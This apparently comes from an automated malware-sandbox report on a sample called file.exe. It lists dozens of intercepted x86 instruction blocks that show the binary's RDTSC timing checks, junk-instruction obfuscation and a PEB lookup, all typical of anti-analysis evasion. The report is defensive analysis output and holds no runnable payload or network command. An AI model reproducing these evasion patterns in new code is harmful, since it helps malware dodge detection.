Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2B54 second address: DF2BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ah 0x00000007 js 00007F70F0BCDB16h 0x0000000d jmp 00007F70F0BCDB10h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 ja 00007F70F0BCDB24h 0x0000001b jnc 00007F70F0BCDB06h 0x00000021 jmp 00007F70F0BCDB18h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF2BA3 second address: DF2BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9D3B second address: DF9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF9D3F second address: DF9D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F70F070E5D6h 0x0000000c jp 00007F70F070E5C6h 0x00000012 pop eax 0x00000013 ja 00007F70F070E5D2h 0x00000019 jns 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA21D second address: DFA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA22F second address: DFA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA808 second address: DFA815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA815 second address: DFA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5D9h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAD3 second address: DFAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAD7 second address: DFAADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAADB second address: DFAAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFAAE1 second address: DFAAE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB60A second address: DFB60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB60E second address: DFB637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F70F070E5D3h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d jnp 00007F70F070E5D2h 0x00000013 jne 00007F70F070E5C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB637 second address: DFB643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F70F0BCDB0Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0060E second address: E00614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00614 second address: E00618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC23 second address: E0FC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F70F070E5C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC2E second address: E0FC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F70F0BCDB11h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC54 second address: E0FC5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE38 second address: E0DE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE3C second address: E0DE46 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE46 second address: E0DE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE4C second address: E0DE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE54 second address: E0DE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DE58 second address: E0DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E27F second address: E0E283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E283 second address: E0E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E819 second address: E0E81F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E81F second address: E0E82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAA5 second address: E0FAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAAB second address: E0FAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FAB1 second address: E0FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F70F0BCDB0Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1547B second address: E15481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15481 second address: E1549F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007F70F0BCDB19h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1549F second address: E154A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E154A4 second address: E154B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E154B0 second address: E154E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F70F070E5D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1577E second address: E15785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23273 second address: E2328D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F70F070E5D0h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2328D second address: E23297 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E23297 second address: E2329D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2329D second address: E232AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E232AE second address: E232C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4421A second address: E44220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44220 second address: E44226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42AF0 second address: E42AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42DD9 second address: E42DE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E430B0 second address: E430B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F7F second address: E43F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F88 second address: E43F92 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E43F92 second address: E43FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E490FF second address: E49103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A61A second address: E8A62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F070E5C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A62B second address: E8A635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A635 second address: E8A63F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A63F second address: E8A65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F70F0BCDB06h 0x0000000a jmp 00007F70F0BCDB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A65F second address: E8A663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A663 second address: E8A69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F70F0BCDB0Ah 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jnp 00007F70F0BCDB1Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E01 second address: E86E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E09 second address: E86E22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F70F0BCDB10h 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E22 second address: E86E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F70F070E5D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E33 second address: E86E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E39 second address: E86E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F070E5C8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86E45 second address: E86E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E981D7 second address: E981F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F70F070E5C6h 0x0000000a jmp 00007F70F070E5CAh 0x0000000f popad 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jno 00007F70F070E5C6h 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E981F9 second address: E98208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98208 second address: E98210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98210 second address: E9821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F70F0BCDB06h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9821B second address: E98223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98223 second address: E98227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98227 second address: E9822B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9822B second address: E98235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98235 second address: E98239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9A914 second address: E9A918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60F3C second address: F60F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F602A3 second address: F602DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d jg 00007F70F0BCDB0Ch 0x00000013 pushad 0x00000014 jne 00007F70F0BCDB06h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60B27 second address: F60B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F60B2B second address: F60B53 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F0BCDB0Ah 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F70F0BCDB0Fh 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6383B second address: F63844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63844 second address: F63848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63AAD second address: F63AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63B76 second address: F63BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F70F0BCDB0Bh 0x00000011 call 00007F70F0BCDB16h 0x00000016 mov dword ptr [ebp+122D1C42h], ecx 0x0000001c pop edx 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F70F0BCDB08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 sub dword ptr [ebp+12478A83h], ecx 0x0000003f call 00007F70F0BCDB09h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jbe 00007F70F0BCDB06h 0x0000004d jo 00007F70F0BCDB06h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63BF4 second address: F63C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F070E5D0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jnp 00007F70F070E5C6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C17 second address: F63C3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F70F0BCDB08h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 jnc 00007F70F0BCDB0Ch 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63C3D second address: F63C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E05 second address: F68E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0B second address: F68E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E0F second address: F68E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E17 second address: F68E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F68E2D second address: F68E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260044 second address: 726004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726004A second address: 7260050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260050 second address: 72600C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007F70F070E5D0h 0x00000016 sub esp, 18h 0x00000019 jmp 00007F70F070E5D0h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007F70F070E5D0h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov bx, AB84h 0x0000002a pushad 0x0000002b mov edi, 3AADCBEEh 0x00000030 mov al, dh 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F70F070E5CDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600C6 second address: 72600CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600CC second address: 72600D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D0 second address: 72600D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600D4 second address: 72600E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72600E5 second address: 72600EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
